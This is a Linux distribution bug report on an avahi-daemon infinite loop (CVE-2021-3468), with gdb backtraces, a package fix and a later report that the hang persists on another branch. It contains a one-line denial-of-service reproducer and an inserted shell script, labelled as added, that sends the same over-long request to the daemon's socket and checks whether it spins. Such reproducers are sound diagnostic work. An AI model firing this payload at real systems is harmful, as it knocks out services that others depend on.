Bug 39357

Summary: avahi-daemon hangs, CVE-2021-3468
Product: Sisyphus    Reporter: Vitaly Lipatov <lav>
Component: avahi-daemon    Assignee: Sergey Bolshakov <sbolshakov>
Status: CLOSED FIXED    QA Contact: qa-sisyphus
Severity: major
Priority: P4    CC: aen, cas, sbolshakov
Version: unstable
Hardware: x86_64
OS: Linux
See Also: http://bugs.debian.org/984938
Bug Depends on:
Bug Blocks: 47848

Description Vitaly Lipatov 2020-12-01 22:17:33 MSK
avahi-daemon-0.8-alt1.x86_64

Found a hung avahi-daemon (it had been eating 100% CPU for tens of hours), stuck somewhere around:

0x00007fdb5bbfd217 in find_next_timeout (s=<optimized out>) at simple-watch.c:429
429	    for (t = s->timeouts; t; t = t->timeouts_next) {
(gdb) bt
#0  0x00007fdb5bbfd217 in find_next_timeout (s=<optimized out>) at simple-watch.c:429
#1  0x00007fdb5bbfd94a in avahi_simple_poll_prepare (s=s@entry=0x1d9ab80, timeout=-1) at simple-watch.c:481
#2  0x00007fdb5bbfdd39 in avahi_simple_poll_iterate (s=0x1d9ab80, timeout=<optimized out>) at simple-watch.c:599
Comment 1 Vitaly Lipatov 2021-04-26 22:08:45 MSK
Still spinning in the same place:

0x00007fb7db7f121f in find_next_timeout (s=<optimized out>) at simple-watch.c:431
431	        if (t->dead || !t->enabled)
(gdb) bt
#0  0x00007fb7db7f121f in find_next_timeout (s=<optimized out>) at simple-watch.c:431
#1  0x00007fb7db7f1c1e in avahi_simple_poll_dispatch (s=0x1919b30) at simple-watch.c:558
#2  0x0000000000407999 in ?? ()
#3  0x00007fb7db55708b in __libc_start_main (main=0x407130, argc=2, argv=0x7ffe42dbb988, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffe42dbb978) at ../csu/libc-start.c:308
#4  0x000000000040810a in ?? ()
Comment 2 Vitaly Lipatov 2021-04-26 22:14:32 MSK
Yes, this is
https://github.com/lathiat/avahi/pull/330
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984938

Reproduces immediately on Sisyphus and p9:
$ perl -e '$|=1; print "a"x(20*1024+1); sleep 1;' | socat - /run/avahi-daemon/socket
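An added check script, not part of the bug report or of the avahi/ALT packaging: it replays the over-long, unterminated request from the reproducer above against the local avahi-daemon socket and then samples the daemon's CPU ticks from /proc to tell a daemon parked in poll() from one looping in find_next_timeout. It assumes socat and pgrep are installed, that the socket is at /run/avahi-daemon/socket (override with AVAHI_SOCKET), that the oldest avahi-daemon process is the one running the event loop, and that CLK_TCK is 100 when getconf is unavailable.

```shell
#!/bin/sh
# Added check (not part of the bug report): replay the over-long request
# from the reproducer and watch whether avahi-daemon starts spinning.
# Assumptions: socat and pgrep are installed, the daemon listens on
# /run/avahi-daemon/socket (override with AVAHI_SOCKET), and the oldest
# avahi-daemon process is the one running the event loop.
SOCK=${AVAHI_SOCKET:-/run/avahi-daemon/socket}
PAYLOAD_BYTES=20481   # one byte past 20 KiB, as in the perl one-liner

# Sum utime+stime (fields 14 and 15) of one /proc/<pid>/stat line.
# The comm field is parenthesised and may contain spaces, so strip
# everything through the closing ") " before splitting on whitespace.
cpu_ticks_from_stat() {
    rest=${1#*\) }
    set -- $rest
    # with pid and comm removed, field 14 (utime) is ${12}, 15 (stime) is ${13}
    echo $(( ${12} + ${13} ))
}

# Succeed if the tick delta over $3 seconds exceeds half a CPU.
# A daemon waiting in poll() uses a few ticks per second; one looping in
# find_next_timeout uses close to CLK_TCK (normally 100) ticks per second.
# $4 optionally overrides the ticks-per-second value (used by tests).
is_spinning() {
    before=$1; after=$2; seconds=$3
    ticks_per_sec=${4:-$(getconf CLK_TCK 2>/dev/null || echo 100)}
    [ $(( (after - before) * 2 )) -gt $(( ticks_per_sec * seconds )) ]
}

# Send PAYLOAD_BYTES bytes of 'a' with no terminating newline, hold the
# connection open for a second, then close it (same shape as the reproducer).
send_overlong_request() {
    { head -c "$PAYLOAD_BYTES" /dev/zero | tr '\0' a; sleep 1; } \
        | socat - "UNIX-CONNECT:$SOCK"
}

# Returns 0 when the daemon stays idle, 1 when it spins, 2 when it cannot run.
check_avahi_spin() {
    pid=$(pgrep -o avahi-daemon) || { echo "avahi-daemon not running"; return 2; }
    [ -S "$SOCK" ] || { echo "no socket at $SOCK"; return 2; }
    send_overlong_request
    t0=$(cpu_ticks_from_stat "$(cat /proc/"$pid"/stat)")
    sleep 3
    t1=$(cpu_ticks_from_stat "$(cat /proc/"$pid"/stat)")
    if is_spinning "$t0" "$t1" 3; then
        echo "VULNERABLE: avahi-daemon pid $pid used $((t1 - t0)) ticks in 3s after the request"
        return 1
    fi
    echo "ok: avahi-daemon pid $pid used $((t1 - t0)) ticks in 3s"
    return 0
}

# Only touch a live daemon when asked explicitly:  sh check-avahi.sh --run
case "${1:-}" in --run) check_avahi_spin ;; esac
```

Run it as root or as a user allowed to connect to the socket; a fixed daemon reports a tick count in the low single digits, while a vulnerable 0.8-alt1 build keeps burning a full core after the client has gone away, which is exactly the state the backtraces above show. Expect a hung daemon to need a restart afterwards.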
Comment 3 Repository Robot 2021-04-28 15:00:18 MSK
avahi-0.8-alt2 -> sisyphus:

 Wed Apr 28 2021 Sergey Bolshakov <sbolshakov@altlinux.ru> 0.8-alt2
 - avoid infinite-loop in avahi-daemon (closes: #39357) (fixes: CVE-2021-3468)
Comment 4 Vitaly Lipatov 2021-06-03 02:23:45 MSK
It still hangs on p9 for some reason:

(gdb) bt
#0  0x00007f0fc54f521f in find_next_timeout (s=<optimized out>) at simple-watch.c:431
#1  0x00007f0fc54f594a in avahi_simple_poll_prepare (s=s@entry=0x10c9b30, timeout=-1) at simple-watch.c:481
#2  0x00007f0fc54f5d39 in avahi_simple_poll_iterate (s=0x10c9b30, timeout=<optimized out>) at simple-watch.c:599
#3  0x0000000000407999 in ?? ()

* Wed Apr 28 2021 Sergey Bolshakov <sbolshakov@altlinux.ru> 0.8-alt2
- avoid infinite-loop in avahi-daemon (closes: #39357) (fixes: CVE-2021-3468)

But it no longer reproduces this way:
> Reproduces immediately on Sisyphus and p9:
> $ perl -e '$|=1; print "a"x(20*1024+1); sleep 1;' | socat -
> /run/avahi-daemon/socket